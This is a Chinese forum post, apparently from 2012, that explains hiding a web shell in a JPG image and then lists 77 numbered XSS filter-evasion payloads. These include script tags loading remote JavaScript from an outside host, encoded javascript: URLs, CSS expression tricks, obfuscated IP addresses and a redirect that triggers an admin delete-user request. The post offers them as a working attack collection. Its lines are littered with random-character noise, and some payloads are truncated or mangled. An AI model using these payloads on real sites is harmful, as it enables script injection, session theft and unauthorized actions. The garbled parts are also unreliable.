跨站图片shell
2 Z3 w4 z3 F4 i% W. `0 WXSS跨站代码 <script>alert("")</script>
) ]* x. A- N: B+ P( i; t7 A& I9 M) z" m% X L/ V
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
# p# V4 o5 ~; c0 I
# Y6 H+ o" Z; ~ z: R
( r# W" q/ d4 m0 o/ d1 u/ C2 F# f5 U0 ?8 b/ K& \# q& Y
1)普通的XSS JavaScript注入
. @5 R n( M9 |' L: r$ H S1 P<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 Q9 ~" ]6 e/ P# T3 j; Y5 O$ X9 t, m/ W" ?% @! k. `7 l1 p
(2)IMG标签XSS使用JavaScript命令) k) I+ {1 z6 a8 s
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 S1 D" i* F, J: Q
3 y' K# Z9 F4 ~; B5 [* k- N(3)IMG标签无分号无引号" ~7 C8 `3 n) z0 q7 W
<IMG SRC=javascript:alert(‘XSS’)>
" S& B0 k" m, V6 W$ Z/ l$ x3 R" W- w# F7 N4 a- ]
(4)IMG标签大小写不敏感
9 l" T4 Q0 V4 k2 r6 |3 g8 F( l<IMG SRC=JaVaScRiPt:alert(‘XSS’)>" T' P1 v" T0 \0 R% J' r. @, y
# o6 [) j3 m( z6 D1 q) H' }/ R(5)HTML编码(必须有分号)
! \" F) I5 Y0 F9 P3 n, U<IMG SRC=javascript:alert(“XSS”)>( `# k) X5 z2 q! x
. `% }7 H, p8 q N(6)修正缺陷IMG标签% V! N `7 z2 {2 b
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
2 _: T4 I8 { K; s: v9 Y% B: v% R# S
(7)formCharCode标签(计算器)
5 D& E9 O6 v8 V<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>0 ?% @+ h2 J* M
7 J5 a) I# n/ l5 r- R2 ^' y
(8)UTF-8的Unicode编码(计算器)$ S7 b* Y/ p% E6 w j4 A
<IMG SRC=jav..省略..S')>
; C- _8 z5 k- E j M
6 G/ @$ v7 T; v& a% P* G, O(9)7位的UTF-8的Unicode编码是没有分号的(计算器)6 ^9 X5 L5 N5 d' _& ~# D
<IMG SRC=jav..省略..S')>1 M! h6 T5 [9 p6 u! G, A
3 w- {/ C3 b7 i
(10)十六进制编码也是没有分号(计算器)+ x, t2 t0 P1 M5 W
<IMG SRC=java..省略..XSS')>4 y5 c- v' }1 N
0 x( U" k8 T# t(11)嵌入式标签,将Javascript分开9 Y7 u: j% T r* D
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; R* N$ N; a+ r/ y: T
- Y4 b4 e; t1 C- K(12)嵌入式编码标签,将Javascript分开* W2 f. }' f& s) m9 Y! W8 z$ q
<IMG SRC=”jav ascript:alert(‘XSS’);”>
. P$ W0 k' `- C; U4 G/ B* Q* }8 j( o2 i- U0 n9 O
(13)嵌入式换行符% \* s2 D1 o2 s$ K9 V% _
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- b* M5 y3 I% a( O8 t' ?5 {: o- l' `; D( Q- I$ V1 D
(14)嵌入式回车
& F2 w9 s! W, C<IMG SRC=”jav ascript:alert(‘XSS’);”>& K% l% a( g! o+ i& v+ H
& e& o' l# ^) P6 C2 k& E(15)嵌入式多行注入JavaScript,这是XSS极端的例子
7 o$ R0 {6 j" V( f# ~<IMG SRC=”javascript:alert(‘XSS‘)”>
- O+ V! i: |) s" o2 V. ~: U, V
5 H+ B0 p0 x: j% p* J8 b(16)解决限制字符(要求同页面)# Q# L# h, A+ m
<script>z=’document.’</script>
5 o7 F9 @7 Z( }8 b: D- E<script>z=z+’write(“‘</script>6 O4 r/ @$ \7 q1 K) C
<script>z=z+’<script’</script>
' b' T& a4 X/ ~% v7 I. l. o<script>z=z+’ src=ht’</script>
7 Q/ T+ [4 E: H3 u( W<script>z=z+’tp://ww’</script>
( a; o3 c% a G9 R1 h<script>z=z+’w.shell’</script>
/ K$ ]8 c1 Z& ^( k<script>z=z+’.net/1.’</script>* w+ n8 }% \+ _ G
<script>z=z+’js></sc’</script>7 L9 H# I& b' q# Y( H& W: S8 e
<script>z=z+’ript>”)’</script>% W( _( ~- m+ E- B: |1 z: B4 V
<script>eval_r(z)</script>
1 Q5 E. @% C, M* \/ V8 V! a! l4 x6 p
(17)空字符
X9 j0 O! V. e' D. V2 s- Xperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 Z8 u' o& G8 ?; b/ ?" X6 T% K: T& J" ]# X/ z
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 E0 L% y+ X. L7 R6 operl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out+ ]/ |' x& ], t3 C# D
) x% K5 c! b1 w6 W* Q6 L' H. V
(19)Spaces和meta前的IMG标签
" |8 }& F& ~# U- G% ~1 ?8 A% S<IMG SRC=” javascript:alert(‘XSS’);”>
) w# c0 c% V F B0 i* k! I5 S" \. Q* a
(20)Non-alpha-non-digit XSS
1 E v5 S, Y7 ^; p<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>- D' a P' X: T" ?0 G. Z7 C/ Z+ m0 c
! s6 v4 }. ]* W% |(21)Non-alpha-non-digit XSS to 21 `" g6 O8 L& p* O- X2 v; h
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- M& c& W% P$ |2 f9 d5 B; Z6 A1 R, V5 z" O" k7 R: M8 I
(22)Non-alpha-non-digit XSS to 3
# ?) A& M6 C) i& ^<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; w5 I, e, h2 C, M5 {( w3 N& W1 C( U/ O$ m% [
(23)双开括号
3 l; i7 w# X' t* G+ M5 x2 @2 R `<<SCRIPT>alert(“XSS”);//<</SCRIPT>" O. k4 d5 }1 h6 Z' D: P' m" [
# G+ v& P6 X3 L6 v8 z, H9 r$ V
(24)无结束脚本标记(仅火狐等浏览器)6 V$ ^- O8 e0 b" A
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
" R3 w; l; s1 u9 z$ m
% A2 X+ W" S6 E( V(25)无结束脚本标记2
# X. z) Z' U! @, Z" B<SCRIPT SRC=//3w.org/XSS/xss.js>
' ~+ q( p) a( E' U9 p' Z$ [7 S7 H( h
(26)半开的HTML/JavaScript XSS6 z! z" D; f; k) u; T
<IMG SRC=”javascript:alert(‘XSS’)”& l0 p. p) O6 a9 x$ [! C; w
! R; P: v' k" U" m- t: s
(27)双开角括号2 D5 |, L5 h* h6 W/ F0 x, [
<iframe src=http://3w.org/XSS.html <7 S) `. m3 w7 r3 _
, f- X' K5 k; r3 r3 O(28)无单引号 双引号 分号- @) G6 f1 f+ v) n" q) U7 I
<SCRIPT>a=/XSS/
) o: P6 w+ D# V+ ~alert(a.source)</SCRIPT>/ M8 w {5 f; U% y7 m
' y; G( y- j$ K(29)换码过滤的JavaScript
1 `- x7 \( ]8 x0 O# i\”;alert(‘XSS’);//9 z) o k. {; v1 o
1 L- u1 S( T- R: d
(30)结束Title标签
" J6 H, T, _8 a3 a9 i" b</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>/ L: w5 r. t, I: K3 E4 R. `
& m: M1 O9 d; ?6 x& ^4 h
(31)Input Image2 f5 [7 ?0 E' F4 q+ C
<INPUT SRC=”javascript:alert(‘XSS’);”>, T2 U% u2 X% w( K/ ^+ u
( m4 @& ^1 b( Q/ y- a3 O( E
(32)BODY Image- P4 p ^) q6 ?2 B/ S
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>9 }$ b4 C9 [! a# M& B* m
. q- r+ k" B6 h1 W3 O$ X
(33)BODY标签
0 ~& P) ^/ {/ D% T# m! a6 ?1 m<BODY(‘XSS’)>+ n! N7 Z l0 P T% }9 J
6 q8 P; H; j% ^, L* a4 _4 t; B
(34)IMG Dynsrc3 ]8 N$ I& f: }5 J; ^4 T
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
0 |4 V! j% r& |! [7 Z$ R
1 U3 H; g& e* N* U(35)IMG Lowsrc
1 [4 I. l* O4 T) s. w0 a<IMG LOWSRC=”javascript:alert(‘XSS’)”>6 u Y A5 `% B
! B* p! l$ R, i5 r/ l0 @- D' z(36)BGSOUND5 D! E/ ~1 Z! K' u! ^$ h% K" U
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
# ^5 c g! `$ z. J8 m9 U; O6 f1 M" H7 I2 F. b9 ?8 [3 n
(37)STYLE sheet4 s6 X. J! f* p; @( ]5 _6 u1 C
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 V J* e3 q: L% d( W4 K( N& t6 P+ G; U
(38)远程样式表$ v2 T) O/ a- p' z1 Y9 u
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>4 }2 G1 I4 A* V
9 {2 B3 \: Q: a7 ^/ \1 M; e
(39)List-style-image(列表式)2 L* B: A+ h' Y7 B3 A
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS0 _* X& V9 T5 N* Q2 F% K
! x# H8 P2 d# c, n9 e(40)IMG VBscript) A( J' o7 F- Q# I) x
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 V% a- P3 ~" w5 H! M8 X1 V2 `% b0 g: H; a% ~* ]
(41)META链接url
! L3 I. x8 U$ }+ `7 g5 Y% [' J<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
% o* m2 z4 |4 E3 h+ ?8 b: C
7 A0 g8 r8 a, z7 K$ c1 D(42)Iframe, k8 @- ~" `0 o% v! t- E0 d
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
! V5 {- U S* B; Y# j5 q(43)Frame9 P" ~' t- g2 S# a: S
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
" r9 o+ U& N) v/ S# W# f/ A* M3 W7 ?( ~ I( s3 @, m
(44)Table& N) D$ w) R4 l' q$ |7 D6 E
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>+ b. O& t) ~9 c$ i4 v! Z$ Y
' m3 Z: Z- h! A" C! a2 o3 a
(45)TD
# W8 W8 C! R6 e$ @ w<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
% L. j4 }8 Y! G% O8 R* z) Y) i+ X, W
u, @7 ?5 E J0 M) p4 l, i(46)DIV background-image9 d3 `+ ~4 p8 x5 @, y, O& R+ R3 Y
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ K0 ]# f/ ^. ^7 I: r1 Y4 _5 }( Y$ z3 E
6 k) d7 @% a1 M8 x, Q7 | H& r5 i(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
Y0 q, M( M( I% A! j: p<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
`/ K( y8 j; K8 U! [
3 I0 H. u) R9 l# H& y# f; ]8 J# R(48)DIV expression
2 S! g+ @* Z3 | H( m6 d; Z<DIV STYLE=”width: expression_r(alert(‘XSS’));”>3 \8 w# Q% K7 Q% p5 \- ?
/ ~& q6 W" K2 E8 M" v
(49)STYLE属性分拆表达1 c" w9 g+ r9 T( A& G
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; F' i" E, ~+ l: U& ]7 A8 ]8 Z- y/ K2 i: e) y+ [
(50)匿名STYLE(组成:开角号和一个字母开头)# t r% g7 G0 u1 F) N7 H
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>0 } B _* X4 r4 L: G8 x& g
. s- i# E; d: S: P
(51)STYLE background-image
# F6 f+ a) v% H; L, U6 X, b: C" W D<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>. {& K9 ?. y) X' y
1 T6 S' x9 q9 h# J$ _ {/ K* Q
(52)IMG STYLE方式% X1 O" h9 l. i8 s' b* l
exppression(alert(“XSS”))’>
1 f8 t$ a* I+ [- a1 e1 x# M9 d6 X' i8 g0 l1 Q' f
(53)STYLE background
; I# R( D D" p% C<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
, w2 g9 o3 o" P% M- B: H8 q3 O) _' T* D
(54)BASE7 M7 r0 R* L6 ~
<BASE HREF=”javascript:alert(‘XSS’);//”>
- K3 C, H4 u, K( G$ u
: k$ A [* O1 k0 n; z+ I(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
. Z* b1 e7 Y" w x2 I8 R8 Q<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>$ a4 b4 F+ _/ V) Z* Z9 E3 m2 v
9 O+ D7 \7 U2 b$ p
(56)在flash中使用ActionScrpt可以混进你XSS的代码8 i* U: _5 p% Q& x' ^9 G3 ]
a=”get”;
# J1 M% S! H7 g& i! E4 h0 Qb=”URL(\”";
8 _8 z" ~: n0 Rc=”javascript:”;2 d4 ^# W; u0 {. y) |
d=”alert(‘XSS’);\”)”;
: C& y) I* m. Y; g y. Oeval_r(a+b+c+d);
/ N; I* U/ v0 t7 q( L, T+ m* _. O2 r# X$ Y0 j L
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上8 d) [2 j) V* W
<HTML xmlns:xss>8 z3 x7 K% k: r0 Y! W
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>0 |4 A& \8 U) v4 q
<xss:xss>XSS</xss:xss>5 `0 e* s; v6 W: z! m' V
</HTML>. K6 M7 [0 I- O0 L: z
' l( ^7 a3 o( n, C X+ p M5 u `
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
" n. K! m8 o4 Y# `: \<SCRIPT SRC=””></SCRIPT>% k4 P' D. y6 `
9 R B/ b% [" u+ B0 a(59)IMG嵌入式命令,可执行任意命令) _# _& m) _0 E+ T8 A- R' V
<IMG SRC=”http://www.XXX.com/a.php?a=b”>7 k' U8 |4 v" u; w$ ?. A% E
* I% n4 {. I3 V! D8 @ H5 L
(60)IMG嵌入式命令(a.jpg在同服务器)# l: w; B* q" G, Q% A+ k* W) ^
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser2 p3 O2 z3 e$ y" P& _8 v& m
& ?: ^0 G' |9 e) D8 o% `(61)绕符号过滤
8 x0 v4 F# i( y. Z<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 K3 Q m' U& V$ L1 S5 Y, c, H2 e9 F" F% j
(62): n* O d( R& {8 T
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# A, K3 |" x9 f. H! t5 q" e
1 w2 V% w# u$ O4 d: M: f5 h(63)6 z5 D2 B ?$ W6 s) _
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>1 L/ p" K: G1 H$ h
+ K! {( |& a( ^0 c
(64)
5 E3 ~# d% Z+ ?+ I! @9 [<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
& i% V" G- w+ m! }4 K$ A! k# Q$ f, y: U
(65)
4 X7 m, s, m* G0 m2 R<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
_/ l- j5 r8 k" U
3 J' s3 Y7 W' e7 {+ J(66)( h" Z' c1 @% F/ P0 |
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ D6 }( c& B9 D) v* i3 Z
* @! X5 z7 G1 I1 L& U(67)
' T! B- |0 P: c: k0 |<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>$ O8 R9 h( j" b0 L) a( J8 b
# |' H* X3 e/ I
(68)URL绕行
P1 ]; g1 Z$ [7 O! z<A HREF=”http://127.0.0.1/”>XSS</A>" f2 h! X! g, \; F+ n8 r
* [: \/ Z4 d# ^3 a" h
(69)URL编码
5 a0 g8 p6 M# w* l9 [<A HREF=”http://3w.org”>XSS</A>9 r3 f3 p6 U+ H% Z
/ h+ i0 I0 ?9 c; ~% w; {. H, N! w% n& M
(70)IP十进制
' w# v" @4 f- Q<A HREF=”http://3232235521″>XSS</A>0 n M0 Z" F! \1 {) J* R7 E
& ~0 B+ g9 ?' l4 m+ `(71)IP十六进制0 I2 w) |' M4 g7 j# m4 c1 f6 H; d
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>5 s$ r1 J+ v7 C
9 m. Y' T3 H) h, m" q# h% n# v(72)IP八进制0 T* A# R ^7 S) k b
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
/ Z; |: o; H- o
* W+ Y0 t: e" r" w(73)混合编码
4 n1 }* u% h3 r# x1 t! u+ y<A HREF=”h* B% I& v6 r7 z0 A
tt p://6 6.000146.0×7.147/”">XSS</A>
) u, I2 e# j2 o
1 E) p& y& k- e; r(74)节省[http:]
% g+ R6 }, w6 _4 h4 _* v<A HREF=”//www.google.com/”>XSS</A>
( D% l4 V0 B. g2 @" D/ T' ]. m
S. P! K5 z" X5 K" c9 J(75)节省[www]
7 t' o& W: u/ _<A HREF=”http://google.com/”>XSS</A>+ F" a; z1 q) J, J2 T, o
+ e/ u% A% B9 O6 |6 ]# P
(76)绝对点绝对DNS
( C. P2 Y) F$ r! O! k, ]9 p7 x<A HREF=”http://www.google.com./”>XSS</A>3 X) N! h. D; ?: F9 O- m1 U
2 S6 f5 I9 ^ h9 f5 D- F(77)javascript链接
& k) O9 H- ~2 `<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
5 b2 w1 R9 Z, g9 d n |
发表于 2012-9-13 17:04:56
收藏
支持
反对